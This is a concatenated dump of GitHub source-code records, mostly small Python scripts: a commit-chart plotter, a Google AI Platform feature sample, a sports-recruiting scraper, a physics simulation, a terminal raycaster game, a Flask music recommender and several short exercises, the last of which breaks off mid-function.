","repo_name":"Henok-Matheas/competitive_programming","sub_path":"1987-number-of-unique-good-subsequences/1987-number-of-unique-good-subsequences.py","file_name":"1987-number-of-unique-good-subsequences.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24810864386","text":"#!/usr/bin/env python\n\nimport time\n\nimport matplotlib.pyplot as plt\n\nfrom multiprocessing import Process\n\nmonths = [\n\t\t\"January\",\n\t\t\"February\",\n\t\t\"March\",\n\t\t\"April\",\n\t\t\"May\",\n\t\t\"June\",\n\t\t\"July\",\n\t\t\"August\",\n\t\t\"September\",\n\t\t\"October\",\n\t\t\"November\",\n\t\t\"December\"\n\t]\n\ndef preprocess_csv():\n\n\ttry:\n\t\tdata = open('commit_data.csv')\n\texcept:\n\t\tprint(\"ERROR: CSV file not found\")\n\n\tlist_data = []\n\tfor commit in data:\n\t\tlist_data.append(commit.replace(\"\\n\", \"\").split(\",\"))\n\n\tsorted_data = sorted(list_data, key=lambda x : x[0], reverse=True)[1:]\n\n\tprocessed_data = []\n\tfor commit in sorted_data:\n\t\tprocessed_data.append({\n\t\t\t\"year\" : int(commit[0]),\n\t\t\t\"month\" : int(commit[1]),\n\t\t\t\"author\" : commit[2],\n\t\t\t\"additions\" : int(commit[3]),\n\t\t\t\"deletions\" : int(commit[4])\n\t\t\t})\n\t\n\tdata.close()\n\n\treturn processed_data\n\ndef show_year_charts(year, year_data):\n\n\tfig, axes = plt.subplots(2, len(year_data), figsize=(15, 5))\t\n\n\ti = 0\n\tfor month, data in year_data.items():\n\n\t\tdate = months[month-1]\n\t\tlabels = list(data.keys())\n\t\tadditions = [commit_data[\"additions\"] for author, commit_data in data.items()]\n\t\tdeletions = [commit_data[\"deletions\"] for author, commit_data in data.items()]\n\t\t\t\n\t\tprint(year, date)\n\t\tprint(f\"\\t authors: {labels}\")\n\t\tprint(f\"\\t additions: {additions}\")\n\t\tprint(f\"\\t deletions: {deletions}\")\n\n\t\taxes[0][i].set_title(f\"{date}\")\n\t\t\n\t\tif len(additions) == 1 and additions[0] == 0:\n\t\t\tpass\n\t\telse:\n\t\t\taxes[0][i].pie(additions, shadow=True, startangle=90, autopct='%1.2f%%', radius=1.45)\n\t\t\taxes[0][i].legend(labels, loc=\"best\")\n\t\t\n\t\tif len(deletions) == 1 and deletions[0] == 0:\n\t\t\tpass\n\t\telse:\n\t\t\taxes[1][i].pie(deletions, shadow=True, startangle=90, autopct='%1.2f%%', radius=1.45)\n\t\t\taxes[1][i].legend(labels, loc=\"best\")\n\n\t\ti = i + 1\n\tprint()\n\n\tfig.suptitle(f\"Charts for the year {year} organised by additions (top) and deletions (bottom)\")\n\t\n\tplt.show()\n\ndef process_year_data(year_data):\n\t\n\tprocessed_year_data = {}\n\n\tcurrent_month = year_data[0][\"month\"]\n\t\n\tfor commit in year_data:\n\n\t\tif commit[\"month\"] not in processed_year_data:\n\t\t\tprocessed_year_data.update({\n\t\t\t\tcommit[\"month\"] : {\n\t\t\t\t\tcommit[\"author\"] : {\n\t\t\t\t\t\t\"additions\" : commit[\"additions\"],\n\t\t\t\t\t\t\"deletions\" : commit[\"deletions\"]\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t})\n\n\t\telse:\n\t\t\tif commit[\"author\"] in processed_year_data[commit[\"month\"]]:\n\t\t\t\tprocessed_year_data[commit[\"month\"]][commit[\"author\"]][\"additions\"] = processed_year_data[commit[\"month\"]][commit[\"author\"]][\"additions\"] + commit[\"additions\"]\n\t\t\t\tprocessed_year_data[commit[\"month\"]][commit[\"author\"]][\"deletions\"] = processed_year_data[commit[\"month\"]][commit[\"author\"]][\"deletions\"] + commit[\"deletions\"] \n\t\t\telse:\n\t\t\t\tprocessed_year_data[commit[\"month\"]].update({\n\t\t\t\t\tcommit[\"author\"] : {\n\t\t\t\t\t\t\"additions\" : commit[\"additions\"],\n\t\t\t\t\t\t\"deletions\" : commit[\"deletions\"]\n\t\t\t\t\t}\n\t\t\t\t})\n\n\treturn processed_year_data\n\ndef process_data(data):\n\t\n\tcurrent_year = int(data[0][\"year\"])\n\n\tyear_data = []\n\n\ttask = None\n\tfor commit in data:\n\t\tif commit[\"year\"] != current_year or commit == data[len(data)-1]:\n\t\n\t\t\tprocessed_year_data = process_year_data(year_data)\n\t\t\t\n\t\t\tif task != None:\n\t\t\t\ttime.sleep(5)\n\t\t\t\ttask.terminate()\n\n\t\t\ttask = Process(target=show_year_charts, args=[current_year, processed_year_data])\n\t\t\ttask.start()\n\t\t\t\n\t\t\tyear_data = []\n\t\t\tcurrent_year = commit[\"year\"]\n\t\telse:\n\t\t\tyear_data.append(commit)\n\t\t\nif __name__ == \"__main__\":\n\tdata = preprocess_csv()\n\tprocess_data(data)\n","repo_name":"Tepja16/Reassessment-Task-CSU33012","sub_path":"final_project.py","file_name":"final_project.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26559991160","text":"from google.cloud import aiplatform\n\n\ndef create_feature_sample(\n project: str,\n featurestore_id: str,\n entity_type_id: str,\n feature_id: str,\n value_type: aiplatform.gapic.Feature.ValueType,\n description: str = \"sample feature\",\n location: str = \"us-central1\",\n api_endpoint: str = \"us-central1-aiplatform.googleapis.com\",\n timeout: int = 300,\n):\n # The AI Platform services require regional API endpoints, which need to be\n # in the same region or multi-region overlap with the Feature Store location.\n client_options = {\"api_endpoint\": api_endpoint}\n # Initialize client that will be used to create and send requests.\n # This client only needs to be created once, and can be reused for multiple requests.\n client = aiplatform.gapic.FeaturestoreServiceClient(client_options=client_options)\n parent = f\"projects/{project}/locations/{location}/featurestores/{featurestore_id}/entityTypes/{entity_type_id}\"\n create_feature_request = aiplatform.gapic.CreateFeatureRequest(\n parent=parent,\n feature=aiplatform.gapic.Feature(\n value_type=value_type, description=description\n ),\n feature_id=feature_id,\n )\n lro_response = client.create_feature(request=create_feature_request)\n print(\"Long running operation:\", lro_response.operation.name)\n create_feature_response = lro_response.result(timeout=timeout)\n print(\"create_feature_response:\", create_feature_response)\n\n\n# [END aiplatform_create_feature_sample]\n","repo_name":"googleapis/python-aiplatform","sub_path":"samples/snippets/feature_store_service/create_feature_sample.py","file_name":"create_feature_sample.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"12085832771","text":"import string\n\nfrom ..hash_map import HashTable\n\n\ndef repeated_word(sentence: str) -> str:\n hash_table = HashTable()\n # region docs\n \"\"\"\n finds the first word that occur more than once in a string\n\n Args:\n sentence (str): sentences as string of length n\n\n Returns:\n str: the first word that is repeated more than once in the given string\n \"\"\"\n # endregion\n\n for word in sentence.lower().split():\n\n word = word.strip(string.punctuation)\n\n try:\n\n hash_table.get(word)\n\n return word\n\n except:\n hash_table.add(word, word)\n","repo_name":"odehabuzaid/data-structures-and-algorithms","sub_path":"python/code_challenges/hashmap/repeted_words/repeated.py","file_name":"repeated.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"23038006441","text":"# Code by Thomas Hagebols\n# Github account: ThomasHagebols\n# LinkedIn account: https://www.linkedin.com/in/thomas-hagebols/\n# Date: 2017-04-21\n\nfrom preamble import *\nimport player_parse\nfrom pathlib import Path\n\nimport pprint\nimport time\nimport random\n\npp = pprint.PrettyPrinter(indent=1)\nrandom.seed()\n\n# Parse the list of url's of all players\ndef get_players(url, year):\n # Load page\n page = requests.get(url)\n tree = html.fromstring(page.content)\n\n # Retreive JSON\n json_data = tree.xpath('//rv-commitments/@prospects')\n parsed_json = json.loads(json_data[0])\n\n # Get list of url's\n urls = []\n for player in parsed_json:\n if player['year'] == year and player['sport'] == \"Football\":\n urls.append(player['url'])\n\n # print(player['name'])\n # print(player['url'])\n # print(player['id'])\n # print(player['stars'])\n # print(player['rivals_rating'])\n # print(player['year'])\n\n return urls\n\n# Get the id of a college belonging to a certain url\ndef get_college_id(url):\n url_list = get_players(url, 2010)\n player_info = player_parse.parse_player_page(url_list[0])\n\n college_info = player_info[player_info.commit == True].values.tolist()\n college_info = college_info[0]\n college_info.append(url)\n\n return college_info\n\n # TODO filter waar de regel True is\n\ndef process_players(urls, win_bet_col_id):\n matrix_operations = []\n\n # Add sleep to fool the firewall of the server\n n = random.random()\n time.sleep(n*2)\n\n\n for i, url in enumerate(urls):\n player_urls_with_errors = []\n print(\"\\nParsing player\", i+1, \"of\", len(urls), \"url:\", url)\n try:\n player_info = player_parse.parse_player_page(url)\n # print(player_info)\n\n lost_bets = player_info[player_info.college_id != win_bet_col_id]['college_id']\n\n for lost_bet_col_id in lost_bets:\n # print(lost_bet_col_id)\n matrix_operations.append((lost_bet_col_id,win_bet_col_id))\n except:\n print('Failed to this player. Url added to error list')\n player_urls_with_errors.append(url)\n\n return matrix_operations, player_urls_with_errors\n\ndef do_operations(adjacency_matrix, operations, colleges_pd):\n # Perform all operations in the operation list on the adjacency matrix\n for operation in operations:\n # Only apply operations of colleges which should in the final dataset\n if any(colleges_pd.college_id == operation[0]):\n x = colleges_pd[colleges_pd.college_id == operation[0]].index.tolist()\n y = colleges_pd[colleges_pd.college_id == operation[1]].index.tolist()\n adjacency_matrix[x,y] += 1\n\n # print('changing value of ',operation)\n # print('maps to:', x,y)\n # print('Has value', adjacency_matrix[x,y])\n\n # input(\"Press Enter to continue...\")\n\n return\n\n\n\n# To test the individual script\nif __name__ == \"__main__\":\n data_path = 'data/'\n player_urls_with_errors = []\n\n\n # get college information\n # Check if csv with college info file exists\n if Path(data_path + 'colleges_info.csv').is_file():\n # import the data from the csv\n colleges_pd = pd.read_csv(data_path + 'colleges_info.csv')\n else:\n college_urls = pd.read_csv(data_path + 'universities.csv', names=['abbrivation', 'url'])\n # create the csv\n colleges = []\n for college_url in college_urls['url']:\n print(college_url)\n colleges.append(get_college_id(college_url))\n\n colleges_pd = pd.DataFrame(colleges, columns=['college_id', 'college_name', 'commit', 'url'])\n colleges_pd.to_csv(data_path + 'colleges_info.csv')\n\n for year in range(2003, 2014):\n print('Processing year:', year)\n adjacency_matrix = np.zeros((len(colleges_pd.index), len(colleges_pd.index)))\n matrix_operations=[]\n\n for index, college in colleges_pd.iterrows():\n print('Processing college', index, 'of', len(colleges_pd.index))\n url_list = get_players(college.url, year)\n\n op, puwe = process_players(url_list, college.college_id)\n\n player_urls_with_errors += puwe\n matrix_operations += op\n print(matrix_operations)\n print(player_urls_with_errors)\n\n # matrix_operations = filter(matrix_operations, colleges_pd.college_id)\n\n # Apply operations to matrix\n do_operations(adjacency_matrix, matrix_operations, colleges_pd)\n pd.DataFrame(adjacency_matrix).to_csv(data_path + str(year)+'.csv')\n\n pd.DataFrame(player_urls_with_errors).to_csv(data_path + 'pages_with_errors.csv')","repo_name":"ThomasHagebols/RivalsParser","sub_path":"team_parse.py","file_name":"team_parse.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40741934709","text":"#!/usr/bin/env python3\n\nfrom collections import Counter\n\ndef word_count(str):\n\t# split string on every whitespace character (space, tab, newline)\n\twords = str.split()\n\n\t# use a special data structure, a Counter, to count the number of\n\t# elements in an iterable.\n\t# This is basically the same as\n\t# for w in words:\n\t# if not w in counter:\n\t# counter[w] = 1\n\t# else:\n\t# counter[w] += 1\n\tcounts = Counter(words)\n\treturn counts\n\nif __name__ == '__main__':\n\tword_count('Lorem Ipsum dolor sit amet.')\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/word-count/1b045f029c3c4afb89135592dc833d75.py","file_name":"1b045f029c3c4afb89135592dc833d75.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"27347752213","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 30 09:55:49 2023\r\n\r\n@author: Sigrid Aunsmo \r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport scipy as sp\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom tqdm import trange\r\n\r\nimport functions as func \r\nimport save_and_load_data as data \r\n\r\n# def new_Es():\r\n# E1 = np.linspace(0.0001,0.2,15)\r\n# E2 = np.linspace(0.2001,0.9,15)\r\n# E3 = np.linspace(0.9001,1.2,20)\r\n# E4 = np.linspace(1.2001,3,5)\r\n# return np.concatenate((E1,E2,E3,E4))\r\n \r\ndef new_Es():\r\n #E1 = np.linspace(0.001,0.2,15)\r\n #E2 = np.linspace(0.2001,0.9,15)\r\n #E3 = np.linspace(0.9001,1.2,20)\r\n #E4 = np.linspace(1.2001,3,5)\r\n #return np.concatenate((E1,E2,E3,E4))\r\n #E1 = np.linspace(0.001,0.99,100)\r\n #E2 = np.linspace(1.001,3,20)\r\n #return np.concatenate((E1,E2))\r\n #return np.linspace(0.0001,2,301)\r\n #return np.concatenate((np.linspace(0.0001,1.5,101), np.linspace(1.6,3,20)))\r\n return np.concatenate((np.linspace(0.0001,0.07,50),np.linspace(0.08,1.5,90), np.linspace(1.6,3,20)))\r\n\r\n\r\nEs = new_Es()\r\n\r\n\r\n\r\n\r\n#filename = 'temperature_dependecy_of_mx_2' #L = 8 #\r\n#filename = 'temperature_dependecy_of_mx_3' #L = 1\r\n#filename = 'temperature_dependecy_of_mx_4' #L = 2\r\nfilename = 'temperature_dependecy_of_mx_5' #L = 1, \r\nfilename = 'temperature_dependecy_of_mx_6' \r\nfilename = 'temperature_dependecy_of_mx_7' \r\nfilename = 'temperature_dependecy_of_mx_8' \r\nfilename = 'temperature_dependecy_of_mx_9' \r\nfilename = 'mx_of_T' #did not seem to be good enough... \r\nfilename = 'mx_of_T_2'\r\n\r\nfunc.deltaE = 0.01 #1e-6 ##1e-3\r\nfunc.nx = 500\r\nfunc.L = 8\r\nfunc.nnodes = 1000 #max nodes for scipy solve_bvp \r\nfunc.t = 1e-4 #tolerance for scipy solve_bvp \r\nfunc.nm = 8\r\nyv_init = np.zeros((32,func.nx), dtype = complex)\r\nfunc.id2 = np.eye(2, dtype = complex)\r\nfunc.x = np.linspace(0,func.L,func.nx) # Es = np.concatenate(np.linspace(0.0001,1.5,351), np.linpace(1.6,3,10))\r\nfunc.Lh = 3\r\n\r\n#beta_prime = 20\r\n\r\n#Ts = np.linspace(0.01,0.99,30)\r\nTs = np.linspace(0.01,0.99,40)\r\nbetas_prime = 1/Ts\r\n\r\n'''Josepshoson junction parameters'''\r\nfunc.h0 = np.array([0,0,0])\r\nfunc.bc_left = func.bc_KL\r\nfunc.bc_right = func.bc_KL\r\nfunc.omega = 0.01\r\nphi = np.pi/4\r\n\r\n'''solving for material L'''\r\n# for t in trange(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)):\r\n# func.E0 = Es[j]\r\n# func.E = func.E0 + 1j*func.deltaE\r\n# func.b = func.calc_b(func.E/np.tanh(1.74*np.sqrt( beta_prime - 1 )))\r\n# func.tb = -func.b \r\n# func.set_up_gmL(func,func.gm_BCS, phi/2)\r\n# func.set_up_gmR(func,func.gm_BCS, -phi/2)\r\n# yv_init = np.zeros((32,func.nx), dtype = complex)\r\n# func.sovle_single_E_general(func,yv_init,f'{filename}_first_E{j}_beta{t}', save = 'only_y')\r\n\r\n# for t in range(len(betas_prime)):\r\n# for j in range(len(Es)):\r\n# E = Es[j]\r\n# y = np.load(f'data2/{filename}_first_E{j}_beta{t}_y.npy')\r\n# middle_index_1 = int(len(y[0])/2) \r\n# ym = data.v_to_m(y)\r\n# np.save(f'data2/{filename}_middle_E{j}_beta{t}.npy',ym[:,:,:,middle_index_1]) \r\n \r\n'''Rashba interface parameters''' \r\nfunc.h0 = np.array([0,0,0])\r\nfunc.pref1 = 0.1\r\nfunc.pref2 = 0.1\r\nfunc.pref3 = 0.1\r\nfunc.omega = 0.1\r\nfunc.bc_left = func.Rashba_bc\r\nfunc.bc_right = func.bc_KL\r\nfunc.L = 8\r\nfunc.x = np.linspace(0,func.L,func.nx)\r\n\r\n'''solving for material R'''\r\n# for t in trange(len(betas_prime)): \r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)):\r\n# E = Es[j]\r\n# func.E0 = E\r\n# func.E = E + 1j*func.deltaE\r\n# func.b = func.calc_b(func.E/np.tanh(1.74*np.sqrt( beta_prime - 1 )))\r\n# func.tb = - func.b\r\n# func.set_up_gmL_from_file(func,f'data2/{filename}_middle_E{j}_beta{t}.npy')\r\n# func.set_up_gmR(func,func.gm_vacum)\r\n# func.sovle_single_E_general(func,yv_init,f'{filename}_sencond_E{j}_beta{t}', save = 'only_y')\r\n\r\n\r\n'''plotting magnetization'''\r\n# dmxL = np.zeros((len(Es),len(betas_prime),func.nx))\r\n# mxL = np.zeros((len(betas_prime),func.nx))\r\n# for t in trange(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)): \r\n# y = np.load(f'data2/{filename}_sencond_E{j}_beta{t}_y.npy')\r\n# ym = data.v_to_m(y)\r\n# fsi, dxi, dyi, dzi, tfsi, tdxi, tdyi, tdzi = data.calc_f_from_gamma(ym)\r\n# mx = np.real(fsi*tdxi - tfsi*dxi) \r\n# dmxL[j,t] = mx*np.tanh(1.76*beta_prime*Es[j]/2)\r\n# mxL[t,:] = sp.integrate.simps(dmxL[:,t,:], Es, axis = 0) \r\n# np.save(f'data2/{filename}_mx_of_T.npy',mxL)\r\n'''Loading'''\r\nmxL = np.load(f'data2/{filename}_mx_of_T.npy')\r\n\r\nplt.figure()\r\n#plt.title('mx')\r\nplt.plot(1/betas_prime[:-2],-mxL[:-2,-1])\r\nplt.hlines(0,0,1)\r\nplt.yscale(\"log\")\r\nplt.ylabel(r'$M_x/M_0$')\r\nplt.xlabel(r'$T/T_c$')\r\nplt.savefig(\"plots/singlet new mx of T.pdf\", bbox_inches=\"tight\", format=\"pdf\")\r\nplt.savefig(\"plots/singlet new mx of T.svg\", bbox_inches=\"tight\", format=\"svg\")\r\nplt.show()\r\n\r\n'''plotting current'''\r\n# dJL = np.zeros((len(Es),len(betas_prime)))\r\n# JL = np.zeros(len(betas_prime))\r\n# for t in range(len(betas_prime)):\r\n# beta_prime = betas_prime[t]\r\n# for j in range(len(Es)): \r\n# y = np.load(f'data2/{filename}_first_E{j}_beta{t}_y.npy')\r\n# ym = data.v_to_m(y)\r\n# J, Jsx, Jsy, Jsz, I_simp, ISx_simp, ISy_simp, ISz_simp,dfs,ddx,ddy,ddz,dtfs,dtdx,dtdy,dtdz,I_fs, I_dx, I_dy, I_dz = data.currents(ym)\r\n# dJL[j,t] = J[int(func.nx/2)]\r\n# JL[t] = sp.integrate.simps(dJL[:,t]*np.tanh(1.76*beta_prime*Es/2), Es, axis = 0) \r\n# np.save(f'data2/{filename}_J_of_T.npy',JL)\r\n'''loading'''\r\nJL = np.load(f'data2/{filename}_J_of_T.npy')\r\n\r\nplt.figure(figsize = (6,6))\r\nplt.title('current')\r\nplt.plot(1/betas_prime[0:],JL[0:])\r\nplt.hlines(0,0,1)\r\nplt.show()\r\n\r\n\r\n'''plot magnetization as a function of T and y'''\r\nX,Y = np.meshgrid(Ts,func.x)\r\nZ = mxL \r\nZmax = np.max(np.abs(mxL))\r\nplt.figure(figsize = (6,6))\r\nplt.title(f'mx at phi {phi}')\r\nplt.imshow(Z.T,vmax = Zmax, vmin = -Zmax, cmap = cm.RdBu,aspect='auto', interpolation='nearest')\r\nplt.colorbar()\r\nplt.show()\r\n\r\nplt.plot(func.x, mxL[2])\r\nplt.show()\r\n\r\n'''plot integrand'''\r\nX, Y = np.meshgrid(func.x,Es)\r\nZ = dmxL[:,0,:]\r\nZmax = np.max(np.abs(Z))\r\nplt.pcolormesh(X,Y,Z,vmax = Zmax, vmin = -Zmax, cmap = cm.RdBu)\r\nplt.colorbar()\r\nplt.show()\r\n\r\n# plt.plot(Es,dmxL[:,0,0])\r\n# '''plot mx as a function of y for one T'''\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sigriaun/Supercurrent-induced-proximity-effects-at-spin-orbit-coupled-interfaces","sub_path":"mx as a function of temperature.py","file_name":"mx as a function of temperature.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"935804291","text":"import random\nimport time\nimport os\nfrom colorconsole import terminal\nfrom Camera import Camera\nfrom Loader import Loader\nfrom Vector2 import Vector2\nfrom WinScreen import WinScreen\n\nclass Runner():\n\tdef __init__(self, actions, loaded_map, map_name, size=Vector2(200, 55), is_maze=False):\n\t\tobjects = loaded_map.objects\n\t\tself.map_name = map_name\n\t\tself.initial_pos = loaded_map.player_pos\n\t\tself.initial_rotation = loaded_map.player_rotation\n\t\tself.escaped = False\n\n\t\tself.camera = Camera(self, self.initial_pos, self.initial_rotation, size)\n\t\tself.camera.update_objects(objects)\n\t\t# self.camera.update()\n\t\tself.map_ = self.camera.send_screen()\n\n\t\tself.actions = actions\n\t\tself.size = size\n\n\t\tself.walk_speed = 2\n\t\tself.sprint_speed = 5\n\t\tself.player_speed = self.walk_speed\n\t\tself.player_rotation_speed = 90\n\n\t\tself.elapsed_time = 0\n\t\tself.last_time = time.time()\n\t\tself.start_time = time.time()\n\n\t\tself.loaded_map = loaded_map\n\t\tself.is_maze = is_maze\n\t\tself.map_on = True\n\t\tif is_maze:\n\t\t\tself.visual_map = str(loaded_map).split(\"\\n\")\n\t\t\tself.maze_size = Vector2(loaded_map.w, loaded_map.h)\n\t\t\tself.map_name += \" maze\"\n\n\t\tself.fps_counter = 0\n\t\tself.last_measurement_time = time.time()\n\n\tdef print_map(self):\n\t\t# Go to upper left corner\n\t\tprint(\"\\033[0;0H\")\n\t\tprint()\n\n\t\t# Minimap rendering\n\t\tif self.is_maze:\n\t\t\tself.loaded_map.update_player_pos(self.camera.pos)\n\t\t\tself.visual_map = str(self.loaded_map).split(\"\\n\")\n\n\t\t# Output the horizontal line\n\t\tfor y in range(len(self.map_)):\n\t\t\tstrip = \"\".join(self.map_[y])\n\t\t\tif self.is_maze and y <= self.maze_size.y and self.map_on:\n\t\t\t\tstrip = \" \" + self.visual_map[y] + strip[self.maze_size.x * 2 + 5:]\n\t\t\tprint(strip)\n\n\t\t# Output FPS count for debugging purposes\n\t\tfps_sample = 20\n\t\tself.fps_counter += 1\n\t\tif self.fps_counter >= fps_sample:\n\t\t\tself.fps_counter = 0\n\t\t\ttime_taken = time.time() - self.last_measurement_time\n\t\t\tself.last_measurement_time = time.time()\n\t\t\tfps = fps_sample / time_taken\n\t\t\tprint(\" FPS:\", int(fps), \" | \", len(self.camera.objects), \"walls | \", len(self.camera.loaded_objects), \"loaded walls \")\n\n\t\t# print(\" FPS:\", int(1 / self.elapsed_time), \" \")\n\n\tdef clear_screen(self):\n\t\tprint(\"\\033[0;0H\")\n\t\tx, y = os.get_terminal_size()\n\t\tprint((\" \" * x + \"\\n\") * y)\n\t\tprint(\"\\033[0;0H\")\n\n\tdef update(self):\n\t\t# Calculate the time since the last frame\n\t\tself.elapsed_time = time.time() - self.last_time\n\t\tself.last_time = time.time()\t\t\n\n\t\t# Check if ESCAPE was pressed\n\t\tif self.actions.has(\"quit\"):\n\t\t\tself.clear_screen()\n\t\t\tquit()\n\n\t\t# Move player\n\t\tself.player_movement()\n\n\t\t# Check if the maze was completed\t\t\n\t\tif self.escaped:\n\t\t\treturn WinScreen(self.actions, self.map_name,\n\t\t\t\ttime.time() - self.start_time, self.size)\n\n\t\t# RENDER THE IMAGE\n\t\tself.camera.update(self.elapsed_time)\n\n\t\t# output the rendered image\n\t\tself.print_map()\n\n\t\treturn self\n\n\tdef player_movement(self):\n\t\tif self.actions.has(\"sprint\"):\n\t\t\tself.player_speed = self.sprint_speed\n\t\telse:\n\t\t\tself.player_speed = self.walk_speed\n\n\t\tif self.actions.has(\"left\"):\n\t\t\tself.camera.rotation += self.player_rotation_speed * self.elapsed_time\n\t\t\tself.camera.rotation %= 360\n\t\tif self.actions.has(\"right\"):\n\t\t\tself.camera.rotation -= self.player_rotation_speed * self.elapsed_time\n\t\t\tself.camera.rotation %= 360\n\t\tif self.actions.has(\"back\"):\n\t\t\tself.camera.move(-self.player_speed * self.elapsed_time)\n\t\tif self.actions.has(\"forward\"):\n\t\t\tself.camera.move(self.player_speed * self.elapsed_time)\n\n\t\tif self.actions.has(\"toggle_map\"):\n\t\t\tself.map_on = not self.map_on\n\t\t\tself.actions.remove(\"toggle_map\")\n\n\tdef escape(self):\n\t\tself.escaped = True","repo_name":"oONemOo/Project_mango","sub_path":"Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36907710997","text":"from MachLearnModule.cluster_network import ClusterNetwork as cluster\nfrom SpotifyModule.spotifyHandler import SpotifyHandler as spotify\nfrom CrawlerModule.WebCrawler import WebCrawler as crawler\n\n\nfrom flask import Flask, render_template\nfrom flask.globals import request\nfrom werkzeug.utils import redirect\n\n\n\n\nflask_app = Flask(__name__)\n\n \n\n\n'''\ninit spotify account\ninit kmean network\n'''\nspoty = spotify()\nsongs = []\nclust = cluster()\ncraw = crawler()\n\nhot_songs = craw.get_songs_from_tabel()\nprint(hot_songs)\nis_in_hot_list = ''\nrecommend=\"\"\nsearch_string = ''\n\ndef get_recommend(search_id):\n print('search_id',search_id)\n if search_id != 'search_song':\n res = spoty.get_title_features(search_id)\n result = clust.get_cluster_from_new_input(res)\n result = list(result)\n return 'https://open.spotify.com/embed/track/'+result[0]+'?utm_source=generator'\n\n\nr = spoty.search_for_song('heros david')\n\nres =spoty.get_title_features(r[0][-1])[0]\n\nsongs.append('https://open.spotify.com/embed/track/'+res['id']+'?utm_source=generator') \n#songs_id.append(res['id'])\n@flask_app.route('/', methods=['GET','POST'])\ndef index():\n search_string = ''\n \n if request.method == 'POST':\n if request.form['button'] == 'search_song':\n search_string = request.form['search_text']\n res = spoty.search_for_song(search_string)\n songs.clear()\n for r in res:\n songs_id = r[-1].split(':')[-1]\n songs.append([\"https://open.spotify.com/embed/track/\"+r[-1].split(':')[-1]+\"?utm_source=generator\", songs_id])\n \n if request.form.get('button'):\n res_id = request.form['button']\n recommend = get_recommend(res_id)\n if str(search_string).lower() in hot_songs:\n is_in_hot_list = 'Yeahh, hot list'\n else:\n is_in_hot_list = ''\n return render_template('home.html', \n title = \"Music Referender\",\n description=\"Smart page for music recomandation\",\n hotlist=is_in_hot_list,\n songs=songs,\n recommend=recommend\n )\n\n else: \n return render_template( \n 'home.html', \n title = \"Music Referender\",\n description=\"Smart page for music recomandation\",\n songs=songs\n )\n\n\n\n\nif __name__ == \"__main__\":\n flask_app.run(debug=True)","repo_name":"Denny-Meyer/IronHack_Song_Recommender","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2560351906","text":"# 저번에 풀어본 문제여서 교수님 풀이로 풀어봄\n# 빨강(1번) 다음에는 파랑(2번)이 와야한다.\n# => 즉 2번을 찾고 직전(prev)가 1번이면 answer ++;\n# 그 후에 prev <- n 갱신\n\nt = 10\nfor tc in range(1, t+1):\n n = int(input()) # 줄\n arr = [input().split() for _ in range(n)]\n ans = 0\n for st in zip(*arr):\n ans += \"\".join(st).replace('0','').count('12')\n\n print(f\"#{tc} {ans}\")\n","repo_name":"ninnistic/algorithm","sub_path":"Baekjoon/3003.py","file_name":"3003.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72777512215","text":"## Read me ##\r\n## This script was made to get 2 lists from 2 differents files and get the difference between then ##\r\ndef compareDocuments():\r\n\r\n smaller_list = []\r\n file = open(\"C:\\Code\\smaller_list.txt\", \"r\")\r\n for item in file:\r\n smaller_list.append(item)\r\n\r\n list_all = []\r\n file_all = open(\"C:\\Code\\Bigger_list.txt\", \"r\")\r\n for item in file_all:\r\n list_all.append(item)\r\n\r\n difference = []\r\n\r\n for total in list_all:\r\n for smaller_item in smaller_list:\r\n have = False\r\n if total == smaller_item:\r\n have = True\r\n break\r\n if have == False:\r\n difference.append(total)\r\n\r\n\r\n with open('list_avg.txt', 'w') as f:\r\n for item in difference:\r\n f.write(item)\r\n\r\nif __name__ == \"__main__\":\r\n compareDocuments()","repo_name":"danielcampanha/Python_BigDataCorp","sub_path":"CompareDocs.py","file_name":"CompareDocs.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"7302595884","text":"import random\n\nimport pygame\n\nfrom dot_blaster import colors\nfrom dot_blaster.constants import FPS, HEIGHT, WIDTH\nfrom dot_blaster.enemy import Enemy\nfrom dot_blaster.physics import GamePhysicsHandler\nfrom dot_blaster.planet import Planet\nfrom dot_blaster.ui import TitleMenu\n\n\ndef start_game_test():\n print(\"START\")\n\n\ndef test_enemy():\n pygame.init()\n screen = pygame.display.set_mode((WIDTH, HEIGHT))\n title_menu = TitleMenu(screen, start_game_test)\n\n while True:\n for event in pygame.event.get():\n if (\n event.type == pygame.QUIT\n or event.type == pygame.KEYDOWN\n and event.key == pygame.K_ESCAPE\n ):\n exit()\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_p:\n 